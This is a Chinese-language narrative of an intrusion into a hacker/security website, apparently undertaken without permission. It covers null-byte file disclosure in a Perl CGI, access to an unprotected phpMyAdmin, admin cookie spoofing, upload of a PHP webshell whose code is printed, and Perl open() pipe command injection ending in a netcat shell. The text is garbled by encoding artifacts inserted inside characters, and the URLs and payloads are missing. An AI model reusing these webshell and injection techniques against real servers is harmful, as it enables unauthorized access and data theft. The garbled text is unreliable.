說(shuō)明:本文類(lèi)屬技術(shù)探討,沒(méi)有兀現(xiàn)測(cè)試站點(diǎn)的必要,故將相關(guān)信息隱去。
武學(xué)之中, 出其不意、劍走偏鋒才能發(fā)揮靈巧之長(zhǎng)。在防火墻廣泛地應(yīng)用于網(wǎng)絡(luò)之間執(zhí)行訪問(wèn)控制策略的今天,以往被漠視的CGI安全悄然興起,形形色色的腳本攻擊在防火墻的“認(rèn)同”下大行其道,看似簡(jiǎn)單的腳本實(shí)質(zhì)上處處暗藏玄機(jī)。本文真實(shí)再現(xiàn)利用腳本缺陷善意侵入target的全過(guò)程,試圖讓您得到一點(diǎn)樂(lè)趣和啟示。
Target.ORG(target網(wǎng)絡(luò)安全小組)是國(guó)內(nèi)較為知名的黑客/安全站點(diǎn),偶然間,我們開(kāi)始了對(duì)她的安全測(cè)試。
沒(méi)有任何遲疑,我們直接從WEB下手。據(jù)了解:target整站程序由站主NetHero編寫(xiě)。基于代碼規(guī)模和復(fù)雜度方面的考慮,我們把目光集中到了網(wǎng)站論壇。我們習(xí)慣首先查看用戶信息,因?yàn)橛脩裘陀脩裘艽a總是緊貼著保存在一起,在這里我們更容易接近我們渴求的信息。提交如下URL
查看NetHero用戶信息:
正常返回用戶信息
出錯(cuò)提示:論壇系統(tǒng)出現(xiàn)問(wèn)題!
返回用戶信息的“發(fā)貼數(shù)量”出現(xiàn)了一個(gè)莫名其妙的字符串,其他的一部分信息也全亂了
看來(lái)這里有點(diǎn)問(wèn)題,這個(gè)字符串到底是怎么回事?我們用以前申請(qǐng)的ID登陸上去后,看到每個(gè)URL的QUERY_STRING后面都有一個(gè)名為key的變量,而且其值和上述的字符串有些相似。難道這個(gè)是密碼?我們接連登陸幾次后,觀察到這個(gè)key值每次都不一樣,看來(lái)這個(gè)key是用來(lái)識(shí)別我們?cè)谡搲纳矸荩瑧?yīng)該與用戶密碼沒(méi)有直接關(guān)系...還是先不管這個(gè)key值了,繼續(xù)用我們的ID做實(shí)驗(yàn),提交了這個(gè)URL
出來(lái)的還是跟先前類(lèi)似的字符串,這個(gè)時(shí)候我們大膽猜測(cè)這個(gè)字符串是我們的密碼,通過(guò)驗(yàn)證,我們發(fā)現(xiàn)這的確是把我們密碼經(jīng)過(guò)標(biāo)準(zhǔn)DES加密后得到的字符串。這證明了我們的猜測(cè)是正確的,這個(gè)字符串中就是加密過(guò)后的用戶密碼。但為什么密碼會(huì)溜出來(lái)?于是我們接著推測(cè):在用戶數(shù)據(jù)目錄里面肯定有兩個(gè)保存每個(gè)用戶信息的文件,一個(gè)里面保存有密碼,而另一個(gè)沒(méi)有,只有一些一般的信息,如郵箱,生日之類(lèi)的。這兩個(gè)文件應(yīng)該一個(gè)是username,另一個(gè)是username.xxx(加了一個(gè)后綴)。userinfo.pl這個(gè)程序使用open函數(shù)打開(kāi)文件的時(shí)候沒(méi)有對(duì)user這個(gè)變量過(guò)濾完全,至少?zèng)]有過(guò)濾掉 ,這使得試圖打開(kāi)username.xxx文件的時(shí)候?qū)嵸|(zhì)上打開(kāi)的并不是username.xxx而是username。打開(kāi)文件的代碼可能是這樣寫(xiě)的open(F,"$path/$username.xxx");所以當(dāng)user=abcdef%00的時(shí)候相當(dāng)于open(F,"$path/abcdef");而這個(gè)文件里正是保存用戶密碼的那個(gè)文件,所以部分用戶信息變量直接到該文件中錯(cuò)誤地取值,之后再反饋輸出給用戶,這樣密碼就出來(lái)了。愜意...我們隨即找出了站長(zhǎng)nethero的密碼,暴力破解的念頭一閃而過(guò)后,我們看還能不能進(jìn)一步突破這個(gè)目錄,于是提交
密碼檔文件出來(lái)了,看來(lái)這里有搞頭,繼續(xù)
受頁(yè)面輸出格式限制,我們只能查看到/etc目錄中一部分文件和目錄;于是試著打開(kāi)一些文件,但也只能查看到文件的一些很小的片段,幾乎沒(méi)什么用,連續(xù)查看了很多文件過(guò)后,都沒(méi)有新的突破,我們有點(diǎn)失望了。于是我們暫時(shí)把這個(gè)BUG放在一邊,看看還有沒(méi)有其他文件存在缺陷,繼續(xù)找一些CGI程序如display.pl,show.pl等,都沒(méi)有發(fā)現(xiàn)可以突破的地方,因?yàn)檫@些文件都做了一些過(guò)濾,看來(lái)這條路走不通了。
既然CGI方面不能突破,那就只有另想路子了。我們拿著那個(gè)userinfo.pl到處查看一些片段文件和目錄,首先搜尋apache的配置文件,最后在/usr/local/etc/apache目錄下找到了httpd.conf ,但還是只能查看文件頭幾行,這些根本沒(méi)什么用。又跑到/home目錄下看了看,嗯,有好多用戶,比先前查看/etc/passwd里面的用戶多多了,因?yàn)椴榭?etc/passwd的時(shí)候只能看到頭幾行,隨便進(jìn)了一個(gè)用戶tomy的目錄,咦,見(jiàn)到了目錄/public_html,看來(lái)系統(tǒng)有可能給每個(gè)用戶分配了發(fā)布個(gè)人主頁(yè)的空間,有意思, 看在瀏覽器里面能不能訪問(wèn)到
呵,看到這家伙的個(gè)人主頁(yè)了,再看看里面有什么東西,這時(shí)我們意外地發(fā)現(xiàn)了一個(gè)/phpmyadmin目錄,立刻訪問(wèn),發(fā)現(xiàn)竟然沒(méi)有密碼驗(yàn)證。現(xiàn)在的我們相當(dāng)于得到了一個(gè)Mysql的用戶,我們?cè)噲D通過(guò)phpmyadmin往數(shù)據(jù)庫(kù)里寫(xiě)東西,內(nèi)容是一個(gè)小的phpshell,然后導(dǎo)出到主頁(yè)目錄里,忙活了半天,終于全寫(xiě)進(jìn)去了,但往硬盤(pán)上寫(xiě)的時(shí)候卻發(fā)現(xiàn)沒(méi)有權(quán)限寫(xiě),一陣郁悶襲來(lái)...
繼續(xù)查看了幾個(gè)用戶的目錄,大部分都沒(méi)有發(fā)布更多的東西,只有些靜態(tài)的頁(yè)面。經(jīng)過(guò)一番努力后,我們終于找到了冤大頭--shuaishuai(帥帥)這個(gè)用戶,轉(zhuǎn)到他發(fā)布的主頁(yè)上看看,哈,發(fā)現(xiàn)了這個(gè)
好家伙,看看能不能跳轉(zhuǎn)目錄
返回了下面這些東西給我們
Warning: is_file() [function.is-file]: SAFE MODE Restriction in effect. The script whose uid is 1007 is not allowed to access
./data//../../../../../../etc/passwd owned by uid 0 in /usr/home/shuaishuai/public_html/show.php on line 77
失敗,但并不是不能跳轉(zhuǎn),只是沒(méi)有權(quán)限而已。那好,我們?cè)僭囍纯茨懿荒懿榭从袡?quán)限的文件
呵呵,成功了,看到了post.php這個(gè)文件的源代碼,太棒了,我們就把這個(gè)做為突破口。但這個(gè)只能查看shuaishuai這個(gè)用戶的文件,不能查看到其他文件,而且只是能查看文件似乎還不夠,我們希望得到一個(gè)shell,這看起來(lái)似乎比較困難。還是另看看其他,其實(shí)shuaishuai的主頁(yè)上東西蠻多的,還有一個(gè)留言板,是X-pad.這個(gè)留言板可以讓用戶注冊(cè)后留言,每個(gè)注冊(cè)用戶在/User目錄下面都有一個(gè)配置文件,保留了用戶的一些信息,在查看注冊(cè)文件源代碼后我們發(fā)現(xiàn)它并沒(méi)有過(guò)濾完全,至少有一個(gè)變量可以使我們可以插入我們的代碼。于是我們申請(qǐng)了一個(gè)用戶在HOMEPAGE這個(gè)字段插入了我們的代碼,使我們的用戶配置文件看起來(lái)像這樣:
$User_Psw = "1234";
$User_QQ = "";
$User_EMail = "";
$User_Homepage = ",$b);unlink($a);#";
$User_Avatar = "Styles/Avatars/blank.gif";
$User_BBSMode = "0";
?>
上面這個(gè)php文件使我們可以上傳文件到指定目錄和刪除有權(quán)限刪除的文件.但在執(zhí)行過(guò)程中卻發(fā)現(xiàn)不行,為什么?原來(lái)沒(méi)有看清楚
$User_Homepage = ",$b);unlink($a);#";
這一行中我們提交的"(引號(hào))前面被自動(dòng)插入了\,使得它不是php語(yǔ)句中的雙引號(hào)("),而是變量中的(") 。即$User_Homepage變量值為 “http://\";copy($a,$b);unlink($a);#” 整個(gè)字符串,并沒(méi)有起到預(yù)期的作用。看來(lái) magic_quotes_gpc = on,再告失敗。
沒(méi)有氣餒,我們繼續(xù)耐心地查找其他可以利用的東西,馬上我們又發(fā)現(xiàn)了 這么個(gè)下載系統(tǒng).經(jīng)過(guò)查看目錄和查看下載系統(tǒng)的源文件(因?yàn)槲覀冇袡?quán)限查看這個(gè)目錄里的文件),在down_sys/data/user/目錄下面發(fā)現(xiàn)了管理員的用戶文件,里
面包含了密碼,但令人頭痛的是管理員密碼是經(jīng)過(guò)md5加密的。此時(shí)我們沒(méi)有輕易放棄這個(gè)經(jīng)加密的密碼,我們即刻查看管理員驗(yàn)證的代碼,在/down_sys/admin/global.php這個(gè)文件中發(fā)現(xiàn)了其驗(yàn)證方式包含cookie驗(yàn)證,相關(guān)代碼如下:
......
if (isset($password)) $password=md5($password);
if (empty($username)) $username=$HTTP_COOKIE_VARS["bymid"];
if (empty($password)) $password=$HTTP_COOKIE_VARS["bympwd"];
if(!checkpass($username,$password)) {
admintitle();
adminlogin();
exit;
}
......
完全可以進(jìn)行一次cookie欺騙。我們這里使用的是一種比較煩瑣的方法:先斷開(kāi)網(wǎng)絡(luò),將我們的IP改為target.org的IP,然后在%systemroot%\system32\drivers\etc\hosts文件里這個(gè)域名指向target.org的ip,做這一步是為了我們?cè)跀嚅_(kāi)網(wǎng)絡(luò)的時(shí)候能夠成功的將解析成它的ip.最后在我們的iis里面自已建一個(gè)虛擬目錄/~shuaishuai/down_sys/admin/寫(xiě)一個(gè)asp文件,把cookie設(shè)置為管理員的用戶名和加過(guò)密的密碼,asp文件內(nèi)容如下:
然后訪問(wèn)這個(gè)asp文件
留著這個(gè)窗口,把IP改回為原來(lái)的192.168.0.1,接著用這個(gè)窗口請(qǐng)求
管理界面出來(lái)了,通過(guò)了驗(yàn)證。接著我們來(lái)上傳文件...可下面的事讓我們氣惱了好久,竟然沒(méi)有上傳文件的功能,F(xiàn)iant,是一個(gè)沒(méi)開(kāi)發(fā)完全的半成品,徹底失望了嗎?不,我們依然有信心,接著查看一下其他的文件,看看能不能對(duì)配置文件動(dòng)點(diǎn)手腳,我們找到了一個(gè)class.php,里面保存的是下載系統(tǒng)的一些軟件分類(lèi)信息,內(nèi)容看起來(lái)像這樣:
5|安全工具|1028372222
8|紅客工具|1034038173
7|其它軟件|1034202097
....
我們?cè)囍锩鎸?xiě)東西,于是在管理頁(yè)面新添加一個(gè)主分類(lèi),分類(lèi)的名稱為"",提交過(guò)后class.php變成了這樣
5|安全工具|1028372222
8|紅客工具|1034038173
7|其它軟件|1034202097
9||1054035604
這個(gè)php文件可以讓我們上傳文件到有權(quán)限目錄和刪除有權(quán)限刪除的文件。于是我們?cè)诒镜貙?xiě)了一個(gè)表單,上傳一個(gè)phpshell上去,然后訪問(wèn)
GOOD,返回了phpshell的界面...一陣高興過(guò)后,我們才發(fā)現(xiàn)這個(gè)phpshell什么命令都不能執(zhí)行,原來(lái)網(wǎng)站PHP打開(kāi)了safe_mode功能,限制我們執(zhí)行命令。但我們已經(jīng)有了很大的突破了,可以向服務(wù)器上傳文件了。接下來(lái)我們利用PHP豐富的內(nèi)置函數(shù)寫(xiě)了很多小腳本上傳測(cè)試,很不幸,系統(tǒng)利用 disable_functions 禁止了大部分的文件系統(tǒng)函數(shù)、目錄函數(shù)...好在并沒(méi)有趕盡殺絕,最后我們寫(xiě)了下面一個(gè)php程序來(lái)查看一些有權(quán)限查看的目錄和文件:
$c = $HTTP_GET_VARS["c"];
$f = $HTTP_GET_VARS["f"];
if($c=="file") {
$file=readfile($f);
echo $file;
}
if($c=="dir") {
$h=opendir($f);
while($file=readdir($h)) {
echo "$file\n";
}
}
if($c=="del") {
unlink($f);
}
?>
在做了很多嘗試過(guò)后,我們發(fā)現(xiàn)在PHP上不能獲得新的突破,好在我們可以利用上面那個(gè)php程序來(lái)查看 目錄中程序腳本的完整的代碼,于是我們決定改向回到起點(diǎn)、查看CGI文件,由于沒(méi)有權(quán)限向可執(zhí)行CGI程序的目錄里寫(xiě)文件, 新寫(xiě)一個(gè)CGI程序來(lái)執(zhí)行命令是不現(xiàn)實(shí)的,所以決定利用現(xiàn)有的.pl程序來(lái)插入命令,目標(biāo)自然是放在perl的open函數(shù)上,于是我們開(kāi)始查找哪些程序用了open函數(shù),但找了好多.pl文件,都沒(méi)有發(fā)現(xiàn),但卻看到有好多readfile()函數(shù),記得perl里面是沒(méi)有這個(gè)函數(shù)的,但這里卻用了很多readfile(),為什么呢?這肯定是他們自已定義的一個(gè)函數(shù),我們看到每一個(gè).pl文件前幾行都有一個(gè)use Club;原來(lái)這里有個(gè)模塊,于是查看Club.pm,很快便發(fā)現(xiàn)了open函數(shù).
sub readkey {
my($file)=@_;
unless(open(FH,"$file")) {
errmsg("對(duì)不起!你超時(shí)了,請(qǐng)重新登陸");
exit;
}
unless(flock(FH,LOCK_SH)) {
errmsg("Can"t Lock file: $file");
}
my $data = ;
close(FH);
return $data;
}
這就是那個(gè)自定義的readfile函數(shù),證實(shí)了我們的猜想,而且也找到了一個(gè)符合要求的open函數(shù),接著搜尋哪個(gè)文件調(diào)用了這個(gè)函數(shù),很快我們?cè)赾hange_pw.pl這個(gè)程序里找到了這個(gè)函數(shù)調(diào)用,這個(gè)程序用來(lái)修改用戶的密碼,不幸的是代碼在判斷用戶舊密碼是否正確前就調(diào)用了 readkey() 函數(shù):
my $key_info=readkey("$key_dir/$key");
于是提交
>bbb%20|
再查看一下
Yeah!成功執(zhí)行了...出現(xiàn)了我們期望的結(jié)果,這真是太妙了,可以利用這個(gè)來(lái)執(zhí)行命令,就相當(dāng)于得到了一個(gè)shell。但這樣辦事畢竟不方便,不能及時(shí)地查看我們的運(yùn)行結(jié)果。因此我們又上傳了一個(gè)文件、編譯、執(zhí)行,然后
D:\temp>nc -vv 12345
[211.161.57.29] 12345 (?) open
id
uid=80(www) gid=80(www) groups=80(www)
uname -a
FreeBSD ns8.target.com 4.8-RELEASE FreeBSD 4.8-RELEASE #1: Wed Apr 2 07:01:40 CST 2003
i386
哦,是FreeBSD 4.8-RELEASE,版本很高,提升權(quán)限比較困難,我們找了好久都沒(méi)有找到有效的local exploit,提升權(quán)限失敗,只好作罷。
到這里,我們的hacking基本上結(jié)束了。雖然沒(méi)拿到root,但至少拿到了網(wǎng)站W(wǎng)EB權(quán)限,對(duì)于我們CGI安全愛(ài)好者來(lái)說(shuō),應(yīng)該算是完成了本職工作吧-)。之后我們迅速與站主聯(lián)系,提醒他網(wǎng)站存在安全隱患,但站主并沒(méi)有向我們?cè)儐?wèn)細(xì)節(jié),他自己通過(guò)分析日志修復(fù)了漏洞。
